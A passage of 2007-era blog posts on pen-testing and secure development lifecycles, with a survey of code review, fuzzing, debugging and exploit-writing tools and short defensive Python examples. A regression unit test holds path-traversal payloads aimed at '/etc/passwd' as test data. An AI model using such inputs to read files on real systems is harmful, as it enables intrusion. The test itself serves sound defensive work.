Pen-testing is an art, not a science
Penetration-testing is the art of finding vulnerabilities in software.
But what kind of an "art" is it? Is there any science to it? Is
pen-testing the "only" way or the "best" way to find vulnerabilities in
software?
When I took my first fine arts class, we learned that "art is for art's
sake" and "beauty is in the eye of the beholder". I spent some time
philosophizing on whether or not that was true. After years, I was never
able to prove those concepts wrong. However, I did learn something
interesting about art. If you're an artist trying to improve technique,
trying to sell art, or trying to send a message -- it all comes down to
one thing: goal setting and accomplishment. Does your artistic outlet
serve your goal? Did you accomplish what you wanted to?
Compliance "audits" and "education/awareness" vs. Security "testing"
and "assurance/process-improvement"
Many organizations are attempting to improve software security assurance
by improving process and technology. Others are just trying to increase
security awareness, or meet compliance objectives. Some are trying to
keep their heads above water -- and every day they worry that another
breach will reach media attention or become a statistic on
Etiolated. For those who are showing
improvements and making software assurance a science and a reality --
they are few in number.
Microsoft started the Trustworthy Computing initiative via a memo from Bill
Gates in 2002. The end result was the Security Development Lifecycle
(SDL), a process to improve software security. The Open Web Application
Security Project (OWASP) was started in 2001, and began a project that
was completed last year called the Comprehensive, Lightweight
Application Security Process (CLASP), which utilized a lot of the
research OWASP members had been working on for years. Also in 2001, Gary
McGraw and John Viega wrote a book called Building Secure Software: How
to Avoid Security Problems the Right Way, which later became a
methodology for Cigital (Gary McGraw's company) to move software
security process knowledge into the hands of Cigital clients. Also last
year, McGraw released a new book, Software Security: Building Security
In, which is the culmination of his Touchpoints process model.
One year and one week after 9/11/2001, the National Strategy to Secure
Cyberspace was released for the public eye. The US Department of
Homeland Security created a National Cyber Security Division, which in
turn created a strategic initiative, the SwA Program (Software
Assurance). This program is based on one short, but very important part
of the National Strategy to Secure Cyberspace document, "DHS will
facilitate a national public-private effort to promulgate best practices
and methodologies that promote integrity, security, and reliability in
software code development, including processes and procedures that
diminish the possibilities of erroneous code, malicious code, or trap
doors that could be introduced during development". The current director
of the SwA Program is Joe
Jarzombek,
who is responsible for many important objectives, including the Build
Security In web portal. This
portal includes much of the on-going work from Cigital, NIST, MITRE, and
the DHS on software assurance process improvements.
The week of 9/11/2007, OWASP held a huge event known as OWASP
Day. OWASP is planning
another OWASP Day, with a March 2008 time frame, for those of us who
missed out on the first one of its kind. One of the presenters in
Belgium, Bart De Win, gave a presentation on "CLASP, SDL, and
Touchpoints Compared". All three are really just books on secure
software processes, so comparing them at first seems a bit like doing a
bunch of book reports (and possibly subjective, going back to the whole
"art is for art's sake" argument). Bart's comparison is interesting, but
I'm interested in what all three are missing. Towards the end of this
blog entry, I'll recommend a new secure software process that takes into
account security testing from both a software assurance model and a
penetration-testing model.
The premise behind having a software development lifecycle that takes
security into account is that at some point -- business analysts,
requirements writers, software architects, software engineers,
programmers, and/or testers will perform tasks that are part of a
process that involves security as a forethought. In other words, testing
"for security" is not done "after-the-fact", nor is it done "right
before release". Security testing before release is typically when
development hands off the application to a support or operations team.
Quality testers refer to this as "operations testing". If security is a
total afterthought, quality testers usually call this "maintenance
testing". Both situations are really where penetration-testing is done,
which is usually accomplished by security professionals, usually in an
IT security team (or consultants hired by such a team). Many of these
individuals actually prefer a black-box assessment, where knowledge of,
or access to, the configurations and source code is again an afterthought.
Some pen-testers prefer a "source-code assisted black-box assessment"
and would like access to the source code and configuration files, but
policy or other constraints limit this kind of access.
One of the questions that might come up here has to do with
penetration-testing as part of compliance objectives, such as
Sarbanes-Oxley, SAS70, HIPAA, or the dreaded PCI-DSS. In this situation,
you have assessors working in an auditor role. A very common trend is
for a PCI "approved scanning vendor" (ASV) to perform a penetration-test
using COTS "security scanners" which often require both customization
and "vulnerability verification". The verification comes into play
because scanners will often identify a vulnerability when it turns out
later that the vulnerability does not exist (a condition known as a Type
I error, or false positive). ASVs test once a year against a
"test-ground" network and web application approved by the PCI Council,
but nowhere does this process require the ASV to remove false positives
or customize their scanner tools. Most COTS security scanners simply
work the first time against the ASV test-grounds. How often they
work or don't work against real-world networks and web applications
without proper customization is left as an exercise for the reader to
determine. Your guess is as good as mine.
Whatever happened to full-disclosure, free information, and the
hackers?
Free security research has been available since the MIT
TMRC started
playing with mainframes and micros. The media and software manufacturers
to this day still don't understand the motivations, tools, and
techniques that hobbyist security researchers have employed -- much of
which has truly been the "art" of vulnerability finding. However, many
hobbyists started or joined businesses during the
dot-com era. The lost "art" of vulnerability finding made its way into
the corporate environment. Around 2001 and 2002, the largest of software
corporations (Microsoft was already mentioned) learned the benefit of
performing self-assessments, including secure code review and even
secure design inspection. Companies such as @stake and Foundstone were
founded and often brought in as consultants to perform these
reviews and inspections; both were later acquired by Symantec and
McAfee, respectively.
Other security researchers (especially ones that were unable to take
part in the dot-com era success due to previous computer felony
convictions, or other disadvantaged situations such as living in a
third-world country) may now form the criminal
underground of the Internet. There are still many people who find
themselves in between these two camps (gray hat hackers), but their
numbers are few compared to what they used to be. If penetration-testing
is still an art form, then these are the only people practicing it --
the black hat and gray hat hackers. It is quite possible that some of
the improvements in fuzz testing have come from these types in the past
few years, although even many of those people have started their own
companies or joined up with some larger organization. Where are the
"hacker groups" that remain out there?
Software manufacturers are beginning to understand the problem, and big
financials and e-commerce also have implemented their own secure
software processes. Earlier this year, Gadi Evron gave a presentation
calling out who was using fuzz testing in the corporate world. The
word on the street is that financials and e-commerce are "fuzzing before
purchase," i.e. they won't buy a new product, especially a network
security device or the latest DLP-HIPS-NAC-UTM solution without running
an internally purchased Codenomicon, BreakingPoint Systems, Mu Security,
or beSTORM fuzz testing engine and doing the best they can to break it
first. "Fuzz before release" occurs when some vendors such as Microsoft,
Symantec, and Cisco build their own custom fuzz testing engines such as
FuzzGuru (Microsoft), SEEAS (Symantec), and Michael Lynn (Cisco -- oh
wait they sued him) -- I mean CIAG (oh wait they dismantled that
group, didn't
they?).
"The future is already here -- it's just unevenly distributed"
The quote above, from William Gibson, describes how the
situation we're in doesn't apply evenly to everyone. However, there are
some things that it obviously does apply to, which I'm about to cover.
Today's security testing tools are surprisingly futuristic -- almost as
good as the ones mentioned in the previous section. This is
partially because fuzz testing isn't the be-all and end-all of security
testing; neither are fault-injection tools and network security scanners
(e.g. Hailstorm and Nessus).
Secure design inspection and secure code review are what make
the secure software processes actually work. However, testing tools for
secure inspection/review are few and far between. They're maturing very
slowly, and many penetration-testers, developers, and managers feel
that:
- Secure inspection/review tools have too many false positives for
developers to deal with, slowing down the programming phase
- Static analysis tools have more false negatives than runtime analysis
that combines fuzz or fault-injection testing, missing a lot of
vulnerabilities
- Design/code review cannot verify vulnerabilities as well as runtime
analysis, making removal of false positives that much more difficult
and time consuming
- Runtime analysis tools combined with fuzz testing and fault-injection
provide a much easier path to writing exploits
- Developers are difficult to work with and will never understand
security issues
- Automated source code analyzers don't support programming languages
or frameworks used
- It's cost-prohibitive to give every programmer a security testing
tool when licensed on a per-IDE basis
If I or the vendors behind these products can put these notions to
rest -- let us give it a shot. In 2008 there is no reason for any of
the excuses above to apply to new software projects. Sure, there is
tons of existing code -- a lot of it in binary format -- much of it
legacy -- and worst of all: your company or organization still relies on
it without a plan to replace or even augment its functionality.
I feel as if I'm stuck in a similar situation using the primary software
pieces that I use everyday -- Firefox, IE, all the major browser-plugins
made by Adobe (Flash and Acrobat), Apple (QuickTime), or Sun
Microsystems (Java). Then there's the other software that I use made by
the likes of AOL, Mozilla + the usual suspects (Adobe, Apple, Microsoft,
and Sun) in the form of instant messaging clients, productivity
applications (MS-Office, OpenOffice, iWork), and arts/entertainment
(Windows MediaPlayer, iTunes, Adobe everything, Apple everything). These
are the targets -- the important software that we need to keep secure.
Yet the only software manufacturer out of the list above that has a
secure software process and writes their own fuzz testing engine is
Microsoft. However, if we were able to secure these applications
properly, then other software would be targeted instead. I use enough
embedded devices running some sort of burned-in software (that rarely,
if ever, updates) to see how that outcome would play out. I'm also one
of those types of security professionals that buys into some of the FUD
with regards to web applications (especially SaaS) and open-source
software used as third-party
components
in everything (the RNA to a full application's DNA).
The Continuous-Prevention Security Lifecycle
The reality is that all software needs to be properly designed and
inspected -- all software requires a secure software process. Earlier I
mentioned that the SDL, CLASP, and Touchpoints processes were "missing
something". While working on the matter, I have discovered some unique
approaches that extend and simplify the primary three secure software
process models. My suggested secure software process consists of only
four elements:
- Developers using Continuous Integration (Fagan inspection + coding
standards + unit testing + source code management + issue tracking +
"nightly" build-servers)
- MITRE CAPEC used in the design review; secure design inspection
performed using CAPEC
- MITRE CWE used in automated secure static code analyzers at
build-time; secure manual code review performed using CWE
- CAPEC and CWE-driven automated fault-injection and/or fuzz testing
tools at build-time, measured with code coverage; verification of
non-exploitables vs. exploitables
All of the above steps can be performed by untrained developers except
for the parts after the semi-colons. For step 2, developers can use
Klocwork K7 or Rational Rose/RequisitePro along with security
professionals during secure design inspection, or provide the security
team with their UML designs or requirements. For step 3, a manual code
review workflow tool such as Atlassian Crucible can be used to combine
Fagan inspection with the necessary security sign-off to complete a
secure manual code review (to be completed on every check-in, component
check-in, or before every nightly/major build -- depending on the
environment). The step 4 verification process requires the most
attention from security professionals, although vulnerabilities found
there can usually be issued a low priority and verified before release.
All the other steps are continuous and can be performed/fixed every day,
possibly at every check-in of code -- but usually at least once a day in
the nightly build.
The most important part of my "Continuous-Prevention Security Lifecycle"
(CPSL) process is for developers to write unit tests that assert the
behavior of each defect's fix. This is known as continuous-prevention
development, and it's a special kind of regression test that works
especially well for security vulnerabilities because it:
- Tests for the bug, as well as can identify bugs with similar behavior
- Fixes the bug, and possibly any bugs that work in the same way if
generic enough
- Can be re-used in build-servers across projects
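To make that concrete, here's a minimal sketch of a continuous-prevention
unit test in Python. The module and sanitize_filename helper are
hypothetical stand-ins for wherever the original defect lived::

    import unittest

    from myapp.files import sanitize_filename  # hypothetical helper under test

    class TestPathTraversalFix(unittest.TestCase):
        """Regression tests pinning the fix for a path traversal defect."""

        def test_original_exploit_is_rejected(self):
            # The exact input from the original bug report must never work again.
            self.assertRaises(ValueError, sanitize_filename, "../../etc/passwd")

        def test_similar_traversal_variants_are_rejected(self):
            # Generalize the assertion to catch bugs that work the same way.
            for payload in ("..\\..\\boot.ini", "%2e%2e%2fetc%2fpasswd",
                            "foo/../../bar"):
                self.assertRaises(ValueError, sanitize_filename, payload)

        def test_legitimate_names_still_work(self):
            # The fix must not break normal behavior.
            self.assertEqual(sanitize_filename("report.txt"), "report.txt")

    if __name__ == "__main__":
        unittest.main()

Once a test like this exists, it runs on every build, so the defect (and
its nearby cousins) can never quietly return.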
Penetration-testers should take special notice that my CPSL process does
not include any operations or maintenance testing. All of the testing is
done before quality testers (or developer-testers) even get to begin
system integration or functional testing. This type of security testing
is meant to be done very early in the process, following guidelines
similar to those the SDL, CLASP, and Touchpoints processes suggest.
The benefits and drawbacks of open-source software
There are some
who may complain about my itemized suggestions based on a limited
budget. For those situations, open-source software can be used: e.g.
Fujaba instead of Klocwork K7, NASA's Software Assurance Technology
Center (SATC) Automated Requirement Tool
(ARM 2.1) instead of IBM
Rational RequisitePro, and Trac instead of Atlassian Crucible. If you
spent any time reading my last blog entry on 2007 Security Testing
tools in
review,
then you'll find gems such as PMD SQLi and FindBugs as reference secure
static code analyzers (as well as the many mentioned for PHP, ASP, and
Java web applications), plus countless open-source fuzzers and
fault-injectors.
As for defining a secure software process for open-source software
projects, many of these are integrated or bundled with commercial
software. Which brings me to a few points. First of all, commercial
software developers should be testing third-party components in addition
to their own code -- anything that gets built on the build-server should
go through the same checks, imported or not. Bugs will get found and
fixed in open-source projects through this sort of effort, in addition
to open-source projects that operate under my CPSL or other secure
process. As a final point, it's no longer theoretical that "the world
can review open-source" thanks to efforts such as BUGLE: Google Based
Secure Code Review.
Software security assurance: Predictions for 2008
One of my predictions for 2008 is that we'll start to see individuals
and companies that have invested in penetration-testing skills move
towards awareness and compliance. The shift will in part be due to
security testing moving to a place earlier in the development lifecycle,
with "penetration-style" security testing tools being replaced with
"secure software process friendly" tools. Many new tools for secure
software process models will evolve from existing workflow management
and design inspection development tools. Classic, gray hat
"penetration-tester" tools such as automated fault-injectors and fuzzers
will become Ant tasks on a build-server. Security testing, if pushed
early in the life cycle, will actually improve code quality -- causing
less spending on quality testing at the cost of more time/dollars spent
on developer-testing.
Do not let all of this confuse you into thinking there isn't room for
major improvements to secure software processes, security testing tools,
or other security research. It's just a simple re-focusing of where,
who, and when security testing is done. This paradigm shift will allow
initiatives like Build Security In, CAPEC, and CWE to really take off.
New projects that concentrate on measuring and understanding false
positives are already in larval stages. Combining data from CAPEC into
other projects such as the WASC Threat Classifications (in a similar way
that the OWASP T10-2007 used CWE data) will lead to new attack patterns
and ways of understanding current attack patterns. Maturity of CWE and
CVE data will drive results for
CWE-Compatible tools and services
to lead into CWE-Effective equivalents.
By allowing developers "in" on the security industry's closely-guarded
and well-kept secrets, we'll be able to protect applications in ways we
have never done in the past. Secure frameworks such as
HDIV will continue to improve, possibly to the
point where security testing isn't necessary for a large majority of
attack paths and security weaknesses. Exploitation countermeasures based
on AI might move into applications to prevent a large amount of
exceptions such as those explored during penetration-testing efforts. At
the very least we'll start to see distributed applications log out users
automatically or disable accounts that attempt automated
fault-injection, potential fraud, or other unwanted attacks. It's
possible that you'll even make a friend on a development team, or maybe
even become a full-time "security developer" yourself. There will always
be room for pen-tester artisans in the wild world of computer science
and software engineering.
Posted by Dre on Sunday, December 2, 2007 in
Defense,
Hacking,
Security and
Tech.
In my last post, I explored some ways of using formal method tools to
perform security
testing
in the most advanced scenarios. It may have been over the heads of many
people, so I wanted to offset that by talking about some basic tools
which I think anyone can utilize effectively, assuming they bring the
most important tool when security testing: their brain.
Of course, you need to think like an attacker, and that said, I can't
recommend a better source than CAPEC and its outreach and enhancement
documents. Books that
come highly recommended (read at least one of these) include:
- `The Web Application Hacker's
Handbook <http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470170778.html>`_
- `The Art of Software Security
Assessment <http://www.aw-bc.com/catalog/academic/product/0,1144,0321444426,00.html>`_
- `Hunting Security
Bugs <http://www.microsoft.com/MSPress/books/8485.aspx>`_
- `Security Power
Tools <http://www.oreilly.com/catalog/9780596009632/>`_
I really think that having some background in development practices is
also necessary, so I recommend other books such as:
- `Continuous Integration: Improving Software Quality and Reducing
Risk <http://www.aw-bc.com/catalog/academic/product/0,1144,0321336380,00.html>`_
- *Secure Programming with Static
Analysis*
- `Software Security: Building Security
In <http://www.aw-bc.com/catalog/academic/product/0,1144,0321356705,00.html>`_
- `The Security Development
Lifecycle <http://www.microsoft.com/mspress/books/8753.aspx>`_
If you want to write or develop exploits in addition to finding security
bugs, there are a few must-have books such as:
- `Fuzzing: Brute Force Vulnerability
Discovery <http://www.aw-bc.com/catalog/academic/product/0,1144,0321446119,00.html>`_
- `The Shellcoder's
Handbook <http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html>`_
(2nd Edition)
- *Real World
Fuzzing*,
Charlie Miller, Toorcon 9 (to be included in a future book)
- `Writing Security Tools and
Exploits <http://www.syngress.com/catalog/?pid=3620>`_
If you have little operations background and want to learn how
modern-day systems and networks are protected, I highly recommend:
- `Network Security
Hacks <http://www.oreilly.com/catalog/netsechacks/>`_ (2nd Edition)
- `Virtual Honeypots: From Botnet Tracking to Intrusion
Detection <http://www.aw-bc.com/catalog/academic/product/0,1144,0321336321,00.html>`_
- `Preventing Web Attacks with
Apache <http://www.aw-bc.com/catalog/academic/product/0,1144,0321321286,00.html>`_
These books will introduce you to hundreds of tools - many of which are
useless, difficult to configure, difficult to understand, and/or about
as robust as the software you're trying to break. While learning some
background and technique is useful, by and large I think you'll get the
hang of a few tools that do one thing well and stick with them.
The most important and widely used security testing tool starts with
program understanding/comprehension. If you have source code for the
application, SciTE is an excellent
source code editor that can be scripted using a language that will
appear throughout this blog entry: Python.
Probably the best way to learn Python is to code Python to help you code
Python using SciTE. This will also introduce you to recursion and
meta-level concepts. However, you don't need to become an expert in
every programming language to use SciTE for secure code review -- all
you need to do is learn how to perform a manual
DFA (or
CFA) for
security weaknesses on each language one time,
and then automate that DFA/CFA through Python scripts in SciTE.
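As a rough illustration, here's the kind of automation I mean -- a crude,
line-based Python sketch that approximates taint tracking at the grep
level, nothing close to a real DFA. The source and sink patterns are
assumptions for a PHP review and would be re-tuned per language after
that one manual pass::

    import re
    import sys

    # Assumed, language-specific lists: user-controlled taint sources and
    # dangerous sinks for a PHP review; swap these out per language.
    SOURCES = [r"\$_(GET|POST|COOKIE|REQUEST)\b"]
    SINKS = [r"\b(mysql_query|exec|system|eval|passthru)\s*\("]

    def scan(path):
        """Flag lines where a tainted variable appears near a dangerous sink."""
        tainted = set()
        with open(path, errors="replace") as f:
            for lineno, line in enumerate(f, 1):
                for pat in SOURCES:
                    m = re.search(r"(\$\w+)\s*=.*" + pat, line)
                    if m:
                        tainted.add(m.group(1))
                for pat in SINKS:
                    if re.search(pat, line) and any(v in line for v in tainted):
                        print("%s:%d: tainted data near sink: %s"
                              % (path, lineno, line.strip()))

    if __name__ == "__main__":
        for p in sys.argv[1:]:
            scan(p)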
Before manual code review, developers may have created program
specifications. In the last post I mentioned formal top-level
specifications, which is rare. More common may be UML models or DSDs.
Using open-source tools such as Fujaba, which
can move between UML models and Java code in Eclipse, may prove useful.
Ideally, this would be done using a formal UML tool such as the
commercial Rational
Rose, or
better -- one specifically for security design inspection, such as
Klocwork
K7.
There aren't any free or open-source tools that are specifically geared
towards secure design inspection, but expect this to change in the near
future. The best work I've seen lately has been done by the
Octotrike team, which was also recently presented at
Toorcon
9
as Privilege-Centric Security
Analysis.
As most security testers will come to understand, not all program source
is easily available. For .NET assemblies (CLR), try using the .NET
Reflector; Java can use
Jode; and Flash can use
Flasm or
Flare. There are some C and other
compiled-language decompilers, but consider using a debugger for your
language if it becomes too complex to easily decompile (or too
inaccurate). In other words, use a debugger such as the
basic DebugView
under Windows (for basic stuff), JSwat
for Java on any platform,
ImmDbg for
advanced Windows debugging, and IDA Pro
(for as many platforms as you own and have access to) if you really want
to rock.
Sometimes it might be better to work with some languages in their native
IDE instead of SciTE, such as using Visual Studio for .NET work, Eclipse
for Java, Flash for Flash, or Aptana for
Javascript. Again, it is often better to work from one solid tool than
to install and use several different tools, although there may be a few
one-off scenarios where you would want to use them. SciTE might not fail
you as often as you would think, especially if you use it as a code
reader (instead of relying on it to build code/classes like an IDE
would, which isn't really what you should be worried about - let the
developers do that hard work for you!).
IDA Pro, while being both an excellent debugger and disassembler, is a
cut above the rest, although I could name plenty of other tools in its
class. IDAPython is the language of
choice for such a tool, bridging over to Immunity Debugger and several
other tools. There is a free version of IDA
Pro, but any
serious person will shell out the money for the non-free version if they
value the primary tool in their toolchain.
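For a taste of what IDAPython buys you, here's a minimal sketch that
enumerates recognized functions and flags call sites of classically
dangerous libc routines. It uses the classic IDAPython API names of this
era (newer IDA releases renamed them), and it only runs inside IDA::

    # Runs inside IDA Pro via IDAPython (classic API names; newer IDA
    # versions renamed these, e.g. GetFunctionName -> get_func_name).
    from idautils import CodeRefsTo, Functions
    from idc import BADADDR, GetFunctionName, LocByName

    # Enumerate every function the disassembler recognized.
    for ea in Functions():
        print("0x%08x %s" % (ea, GetFunctionName(ea)))

    # Flag every reference to a classically dangerous libc routine.
    for name in ("strcpy", "sprintf", "strcat", "gets"):
        ea = LocByName(name)
        if ea != BADADDR:
            for xref in CodeRefsTo(ea, 0):
                print("reference to %s at 0x%08x" % (name, xref))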
Debugging web application client-side code such as Javascript can't get
any easier than by using FireBug,
although I have found myself wanting better representations of code
before using it. I can't recommend the Web Developer
Toolbar
functionality for viewing Javascript, source, and "generated source"
highly enough -- but also View Source
Chart,
DOM Inspector
(along with
InspectThis),
and UrlParams
in the sidebar. For Flash apps, there is the
FlashTracer add-on that can
also be used in the sidebar, which responds to trace operations (you may
need to put these in yourself), and also a local proxy called
Charles, which
supports Flash Remoting.
Viewing code and debugging code will help with program flow and
understanding. Some Python tools such as
HeapDraw and Python
Call Graph make great visualization
tools to aid in this type of work. You'll want to learn how to implement
automated DFA (data flow analysis), view control flow
graphs, basic block
graphs, and how to view
these under a scenario called hit-tracing. Hit-tracing will allow you to
watch the flow of the application only under certain conditions that you
want to see, while filtering out everything else. The
PaiMei tool will provide
this, and by doing so - you're really discovering an important aspect of
code known as coverage: how much of the code your testing actually
exercises.
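The idea is easy to see in miniature with Python's standard-library
trace module -- a toy stand-in for what PaiMei does against native
binaries. The parse function here is just a contrived target::

    import trace

    def parse(data):
        # Toy "application under test": different inputs hit different branches.
        if data.startswith(b"MAGIC"):
            return "header"
        if len(data) > 64:
            return "long"
        return "short"

    # Count which lines each test input drives execution through -- the
    # same coverage question PaiMei answers for native code.
    tracer = trace.Trace(count=1, trace=0)
    for sample in (b"MAGIC....", b"A" * 100, b"x"):
        tracer.runfunc(parse, sample)

    # Writes an annotated .cover file showing hit counts and missed lines.
    tracer.results().write_results(show_missing=True, coverdir=".")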
There are right ways and wrong ways for both security testers and
developers to utilize code coverage in their testing approaches. Besides
the PaiMei tool, there are code coverage tools that are specific to
certain languages, and that often require flags at compile/build time.
gcov and lcov are
examples of code coverage tools that require being built into the
software. Other approaches, such as NCover for
.NET, and EMMA for Java (using
EclEmma while in Eclipse) do not have this
requirement. There are even coverage
validators
available for Javascript.
Normally, developers utilize code coverage during "unit testing", a
recent invention of quality testing made by developers, for developers.
Unit tests are quick 1-3 second checks in their IDE that
they can use to assert behavior and provide an instant fix. More
advanced unit tests called "component tests" can be done during a build,
along with mocks (fake database or other system necessary to assert
behavior of a fully implemented application). Typically these are all
for functional tests, and possibly also for performance. Rarely are
applications tested for security in this manner; unit testing was
really built for functional tests (although it theoretically could be
adapted for security testing).
It's sometimes ok to pretend you're a developer just to see what idiotic
things they skip over when they write and build their code. In this
case, you will want to load the code into its native IDE (say, Eclipse
for Java). Then, promote all the warnings you can to errors, build, and
see what the environment spits out at you. Load automated static
bytecode analyzers, which often have a large amount of security checks
(e.g. FindBugs,
FxCop,
CAT.NET, and AspectCheck), as well as source code checkers -- and use
this time to write some of your own basic checks (especially to find
low-hanging fruit). For Java, PMD is
extensible through XPath; for an example, see the PMD SQLi
Rules. Also check what demos are
available in terms of
CWE-Compatible tools - I've used
Fortify SCA to great
effect here. There are also plenty of open-source static analysis tools,
but many aren't as complete as their CWE-Compatible commercial cousins.
If you can find some basic unit tests to run (e.g.
Crap4J), these may
also provide better program understanding, especially when combined with
inspection tools such as Armorize
CodeSecure, Fortify
SCA, OunceLabs, Klocwork K7, GrammaTech
CodeSonar,
and the bytecode checkers (i.e. FindBugs, FxCop, CAT.NET, and
AspectCheck).
Security testers have created their own sort of unit tests which involve
injecting faults into an application, or even better -- sending random
or specially-crafted data to the application inputs -- often called
fuzzing or `fuzz testing'. Fuzz testing tools are numerous, although
one of the best tools is EFS,
which stands for Evolutionary Fuzzing System. EFS provides random data
to an application along with code coverage reports from PaiMei. It
enhances the tests using this code coverage data by implementing genetic
algorithms. Some of these tests cannot be solved, but a satisfiability
solver can provide extensive coverage beyond GAs in this situation.
STP,
zChaff, and
Saturn are examples of satisfiability
solvers, while catchconv
integrates these concepts as a
variant to
Valgrind (a popular dynamic analysis tool,
similar to IDA Pro, but focused mostly on memory debugging). Valgrind's
Memcheck,
DynamoRIO, Purify
(commercial), DynInst, and
Pin are actually dynamic binary
instrumentation (DBI) tools which would work well with PaiMei's crash
binning
routines
when attempting to find off-by-one's and incrementing counter crashes
(and other issues that may be better found through formal method
security testing).
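To show the evolutionary idea in miniature, here's a toy
coverage-guided fuzzer in Python. It's nothing like EFS in scale, and
the target function is a contrived stand-in, but the
select-mutate-measure loop is the same shape::

    import random
    import sys

    def target(data):
        # Toy parser with nested branches -- deeper paths need evolved inputs.
        if len(data) > 4 and data[0] == ord("Z"):
            if data[1:3] == b"42":
                if sum(data) % 7 == 0:
                    raise RuntimeError("crash: deep path reached")

    def coverage_of(func, data):
        """Fitness = set of lines executed, gathered via sys.settrace."""
        hits = set()
        def tracer(frame, event, arg):
            if event == "line":
                hits.add(frame.f_lineno)
            return tracer
        sys.settrace(tracer)
        try:
            func(data)
        except RuntimeError:
            print("crash on input: %r" % data)
        finally:
            sys.settrace(None)
        return hits

    def mutate(data):
        buf = bytearray(data)
        buf[random.randrange(len(buf))] = random.randrange(256)
        return bytes(buf)

    population = [bytes(random.randrange(256) for _ in range(8))
                  for _ in range(20)]
    for generation in range(200):
        ranked = sorted(population,
                        key=lambda d: len(coverage_of(target, d)),
                        reverse=True)
        survivors = ranked[:5]                    # selection by coverage
        population = survivors + [mutate(random.choice(survivors))
                                  for _ in range(15)]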
Random fuzzing along with code coverage is probably one of the most
advanced tools in a security tester's toolbox. However, there are some
cases where binary protocols hit protocol parsers on both sides of a
connection. Tools such as
ProxyFuzz
and Universal
Hooker can make
it easy to determine whether one side or both sides of a connection
require more than just random fuzz testing. If this is the case, a lot
of manual work may be required to determine which parts of the data are
encrypted (if any), compressed (if at all), or separated by TLVs (type,
length, value). Using a specification may be the easiest way to
implement a specially-crafted fuzz testing tool for the "application
under test" (AUT). Using a fuzzing framework such as
Sulley
or Peach can make building this
tool much easier than doing so by hand. In some cases, files (not
protocols) are loaded or unloaded by applications. Certain fuzz testing
tools work specifically well for writing random or specially-crafted
files, and others are provided by frameworks. Depending on the platform
or type of application you're targeting, you'll want to look at a few
different file fuzzing tools/techniques, but
FileFuzz (by Mike
Sutton) seems to stand out as a good starting point (similar to
ProxyFuzz for protocols). For other file fuzzing tools, see
FileP (my favorite,
written by Tim Newsham),
SPIKEfile and
notSPIKEfile,
Ufuz3,
FuzzyFiles, and
Mangle. I'll leave
targeting browsers, web servers, and web applications with fuzz testing
techniques for later, but these should give you a general idea of what
is available. There's also fuzzing environmental variables, in-memory,
etc. Note that Sulley,
Peach, and FileP are all Python frameworks for coding specially-crafted
fuzz testing tools.
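In the spirit of FileFuzz, a dumb mutation-based file fuzzer fits in a
page of Python. The target application and seed file are whatever AUT
you point it at; anything that exits nonzero, dies on a signal, or
hangs is worth triage::

    import os
    import random
    import subprocess
    import sys

    def mutate(seed, ratio=0.01):
        """Flip roughly `ratio` of the bytes in a known-good seed file."""
        data = bytearray(seed)
        for _ in range(max(1, int(len(data) * ratio))):
            data[random.randrange(len(data))] = random.randrange(256)
        return bytes(data)

    def run_case(app, path, timeout=5):
        """Launch the AUT on a mutated file; abnormal exits are interesting."""
        try:
            proc = subprocess.run([app, path], timeout=timeout,
                                  stdout=subprocess.DEVNULL,
                                  stderr=subprocess.DEVNULL)
            return proc.returncode
        except subprocess.TimeoutExpired:
            return "hang"

    if __name__ == "__main__":
        app, seed_path = sys.argv[1], sys.argv[2]
        seed = open(seed_path, "rb").read()
        ext = os.path.splitext(seed_path)[1]
        for i in range(1000):
            case = "case_%04d%s" % (i, ext)
            with open(case, "wb") as f:
                f.write(mutate(seed))
            result = run_case(app, case)
            if result != 0:
                print("interesting result %r for %s" % (result, case))
            else:
                os.remove(case)      # keep only the cases worth triage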
Often there are situations where rolling your own fuzz testing framework
or dissecting a protocol or file format may seem like the last thing you
want to do. Prototyping this work should be a first step to determine if
the effort is worthwhile. I gave examples of using both ProxyFuzz and
uhooker as starting points. Combine this with code coverage, and check
to see if the results show how well you've tested. Before starting a
fuzz testing project using a framework or writing your own tool (or a
full-blown client), you may want to do a few more checks. This is where
knowledge of bash and C can come in as extremely helpful. Small C
programs are fast, easy to write if you're just trying to do one thing
well (run a looped test), and can be easily piped on the Unix command
line to "try different things out". The bash shell provides ease of use
when writing loops or conditionals for a bunch of small programs piped
together, to combine speed with agility and flexibility in prototyping.
Using the Matasano Blackbag tools (or by writing your own tools similar
in nature/effect), it becomes easier (and more fun) to reverse binary
protocols/formats than by reading specs and building run-once Python
scripts. Of course, finding the Matasano Blackbag tools may be difficult
as they now recommend writing protocol
dissectors
using Ruby along with
BitStruct. A commenter
suggests using Construct with Python,
as well as the popular scapy
Python library found quite often in the literature.
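As a small example of the Construct approach, here's a hypothetical TLV
record dissector. Note this uses the current Construct API, which has
changed considerably since this was written::

    from construct import Bytes, Int8ub, Int16ub, Struct, this

    # Hypothetical TLV record layout for an undocumented binary protocol:
    # one type byte, a big-endian two-byte length, then `length` value bytes.
    Record = Struct(
        "type" / Int8ub,
        "length" / Int16ub,
        "value" / Bytes(this.length),
    )

    blob = bytes([0x01, 0x00, 0x05]) + b"hello"
    rec = Record.parse(blob)
    print(rec.type, rec.length, rec.value)   # -> 1 5 b'hello'

    # The same declaration builds packets too -- handy for fuzzing fields.
    print(Record.build(dict(type=2, length=3, value=b"abc")))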
Almost a lost art, but related to file fuzzing and binary protocol
dissection is binary analysis. Many continue to use IDA Pro to perform
these sorts of bug-finding techniques, using IDC scripts such as the one
by Halvar Flake, BugScam.
Tools such as bugreport,
BEAST and
OBOE can also be used, but it may be better to re-write this
functionality in IDAPython, possibly by using x86 emulators, or PEiD to
remove potential code obfuscations. Halvar Flake's company, SABRE
Security, also maintains the best tools
for program analysis, debugging, and testing for security. The primary
reference tool, BinNavi, works on embedded processors as well as most
platforms you can think of. I've heard he can make it available to
people who cannot afford it, depending on project scope.
BinNavi/BinDiff have simply the best reputation in the business, and
like PaiMei, require IDA Pro.
After a security-related bug is found (using automated inspection,
automated fault-injection, automated random fuzzing, or by partially
automating specially-crafted fuzz testing, binary analysis, or code
review), some will choose to report it to vendors, some will write
exploits, and some will do none of the above. If an exploit is intended
to be written, you'll find lots of support for doing so using the
Immunity
Debugger
and the Metasploit package. There are some automated exploit writers
including the MSF-eXploit
Builder,
Byakugan/noxdbg, and
Prototype-8. Python
would appear dominant for exploit writing were it not for the
Metasploit project, which has moved to Ruby. If a security testing
team's focus leans heavily towards writing exploits, then it is suggested
that Ruby equivalents replace SciTE, ImmDbg, IDAPython, PaiMei, and the
various fuzzing frameworks and tools already mentioned, or that security
testers learn both Python and Ruby equally well.
Writing exploits for web applications is a quite different matter. There
